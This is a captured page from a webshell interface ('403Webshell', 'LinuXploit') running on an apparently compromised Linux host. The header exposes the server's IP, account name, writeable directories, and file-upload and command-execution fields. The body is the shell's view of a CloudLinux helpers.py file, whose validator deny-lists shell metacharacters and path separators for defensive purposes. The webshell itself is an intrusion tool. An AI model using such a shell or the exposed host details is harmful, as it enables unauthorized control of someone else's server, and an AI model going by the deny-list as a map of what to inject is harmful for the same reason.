403Webshell
Server IP : 213.136.93.164  /  Your IP : 216.73.216.104
Web Server : Apache
System : Linux m14200.contabo.net 5.14.0-611.54.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed May 6 18:03:03 EDT 2026 x86_64
User : ki692510 ( 1047)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /opt/cloudlinux/venv/lib64/python3.11/site-packages/clcommon/public_hooks/lib/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /opt/cloudlinux/venv/lib64/python3.11/site-packages/clcommon/public_hooks/lib/helpers.py
# -*- coding: utf-8 -*-
# Copyright © Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2018 All Rights Reserved
#
# Licensed under CLOUD LINUX LICENSE AGREEMENT
# http://cloudlinux.com/docs/LICENSE.TXT
#
import argparse
import inspect
import logging
import os
import re
import sys

import raven
import time
from io import StringIO
from contextlib import contextmanager
from functools import wraps

logger = logging.getLogger(__name__)


def _sanitize_log_value(value):
    """Strip control characters from a value before logging."""
    return str(value).replace('\n', '\\n').replace('\r', '\\r')


LISTENERS_DIRECTORY = '/usr/share/cloudlinux/hooks/listeners/'

# Hosting account / panel-owner name validator.
#
# Deny-list of dangerous characters, expressed as a negated character class.
# The previous allow-list `^[a-z_][a-z0-9._-]{0,31}$` (MR !30) over-narrowed:
# it rejected non-ASCII reseller/owner names that Plesk legitimately produces
# (e.g. `реселлер4` in lve-utils' Plesk i18n fixtures), which broke
# lve-utils.python_tests.test_cpapi_plesk on Plesk and stalled the nightly
# (CLOS-4470). Same threat model is still covered: control chars, whitespace,
# path separators, and shell metacharacters are rejected.
#
# Forbidden:
#   * `\x00-\x1f` and `\x7f`     C0/C1 control chars and DEL
#                                (log-line breaks, terminal escapes)
#   * `\s`                       whitespace
#                                (CLI-arg ambiguity, log-line breaks)
#   * `/` `\`                    path separators
#                                (path traversal inside listener scripts)
#   * `; & | \` $ ( ) < > ' "    shell metacharacters
#     `! * ? [ ] { } ~`          (command injection if a listener spawns a
#                                shell; glob/brace/history expansion)
#
# Length 1..255 (matches typical filesystem NAME_MAX; generous for any panel).
# All other Unicode codepoints are allowed.
_VALID_NAME_RE = re.compile(
    r"\A[^\s/\\;&|`$()<>'\"!*?\[\]{}~\x00-\x1f\x7f]{1,255}\Z"
)


def valid_name(value):
    """Validate a hosting account / panel-owner name (argparse ``type=``).

    post_modify_user.py, pre_modify_user.py, post_modify_admin.py and
    post_modify_domain.py use this callback so that values carrying shell
    metacharacters, path separators, control chars, or whitespace are
    refused before they are dispatched to listener plugins.

    A value is accepted when it is a ``str`` that `_VALID_NAME_RE` matches
    in full: 1..255 characters, none of them forbidden.

    :param value: raw command-line value to check
    :return: ``value`` unchanged when it is acceptable
    :raises argparse.ArgumentTypeError: when ``value`` is not a string or
        does not match `_VALID_NAME_RE`
    """
    is_acceptable = (
        isinstance(value, str)
        and _VALID_NAME_RE.fullmatch(value) is not None
    )
    if is_acceptable:
        return value

    raise argparse.ArgumentTypeError(
        f'invalid name {value!r}: contains forbidden character or has '
        f'length outside 1..255')


@contextmanager
def capture_output(stdo, stde):
    """Temporarily redirect ``sys.stdout`` and ``sys.stderr``.

    While the ``with`` body runs, ``sys.stdout`` points at ``stdo`` and
    ``sys.stderr`` at ``stde``; a falsy argument is replaced by a throwaway
    ``StringIO``. The streams that were active on entry are put back on
    exit, whether or not the body raised.

    :param stdo: file-like object that receives stdout, or a falsy value
    :param stde: file-like object that receives stderr, or a falsy value
    """
    saved_streams = (sys.stdout, sys.stderr)
    try:
        sys.stdout = stdo if stdo else StringIO()
        sys.stderr = stde if stde else StringIO()
        yield
    finally:
        # always restore the streams that were active on entry
        sys.stdout, sys.stderr = saved_streams


def hook_method(func):
    """
    Magic decorator that calls all subclass methods
    that override base decorated one.
    Requirements:
    - subclass must be defined in .py file in LISTENERS_DIRECTORY
    - subclass must NOT start with '_' char
    - subclass must override base event method (the one with '@hook_method')

    The body of the decorated function itself is never executed: calling
    the wrapper only dispatches to the listeners and returns None.

    Every listener runs with stdout/stderr captured. A listener that raises
    (either in its constructor or in the event method) is reported through
    Raven and logged as a warning, and the remaining listeners still run.
    """
    @wraps(func)
    def _wrapped(self, *args, **kwargs):
        expected_dir = os.path.normpath(LISTENERS_DIRECTORY)
        # __subclasses__() only returns direct subclasses,
        # so we can't make `proxies` now
        for subclass in self.__class__.__subclasses__():
            # a class whose module cannot be resolved, or whose module has
            # no __file__, cannot be located in LISTENERS_DIRECTORY:
            # treat it as misplaced instead of crashing the whole dispatch
            module_file = getattr(inspect.getmodule(subclass), '__file__', None)
            listener_path = os.path.dirname(module_file) if module_file else None
            # skip child if it is not in expected directory
            if listener_path is None or expected_dir != os.path.normpath(listener_path):
                logger.warning('%s is not in %s directory; it is in %s,'
                               ' skip', subclass, LISTENERS_DIRECTORY, listener_path)
                continue
            # skip internal classes
            if subclass.__name__.startswith('_'):
                continue

            # magic: get method only if it is defined in child (NOT in parent)
            try:
                listener = getattr(subclass(), func.__name__)
            except Exception:
                # a listener that cannot even be constructed must not
                # prevent the other listeners from receiving the event
                raven.base.Raven.captureException(
                    fingerprint=['{{ default }}', subclass.__name__, func.__name__],
                )
                logger.warning('listener %s:%s could not be instantiated',
                               subclass.__name__, func.__name__, exc_info=1)
                continue
            if getattr(listener, 'is_magic_method', False):
                logger.debug('skip %s is not implemented in %s',
                             func.__name__, subclass.__name__)
                continue

            logger.info('executing %s:%s', func.__name__, subclass.__name__)
            # monotonic clock: elapsed time must not be affected by
            # system clock adjustments
            started = time.monotonic()
            stdout, stderr = StringIO(), StringIO()
            try:
                with capture_output(stdout, stderr):
                    listener(*args, **kwargs)
            except Exception:
                # use Raven carefully and only in places where
                # you sure that sentry is already initialized
                raven.base.Raven.captureException(
                    fingerprint=['{{ default }}', subclass.__name__, func.__name__],
                    extra={'stdout': stdout.getvalue(), 'stderr': stderr.getvalue()}
                )
                logger.warning('listener %s:%s crashed', subclass.__name__, func.__name__, exc_info=1)
            finally:
                elapsed = time.monotonic() - started
                stdout_str = stdout.getvalue()
                if stdout_str:
                    logger.info('captured stdout of %s:%s\n~BEGIN OUTPUT~\n%s\n~END OUTPUT~\n',
                                func.__name__, subclass.__name__, stdout_str)
                stderr_str = stderr.getvalue()
                if stderr_str:
                    logger.debug('captured stderr of %s:%s\n~BEGIN OUTPUT~\n%s\n~END OUTPUT~\n',
                                 func.__name__, subclass.__name__, stderr_str)
                logger.debug('running %s: %.4f elapsed', func.__name__, elapsed)
        logger.info('%s executed by the user with uid %s and gid %s',
                    func.__name__, os.geteuid(), os.getegid())
        logger.info('ended %s(%s, %s)', func.__name__,
                    _sanitize_log_value(args), _sanitize_log_value(kwargs))

    # special marker to determine overridden methods: a subclass that does
    # not override the event method inherits this wrapper (and the marker)
    _wrapped.is_magic_method = True
    return _wrapped

Youez - 2016 - github.com/yon3zu
LinuXploit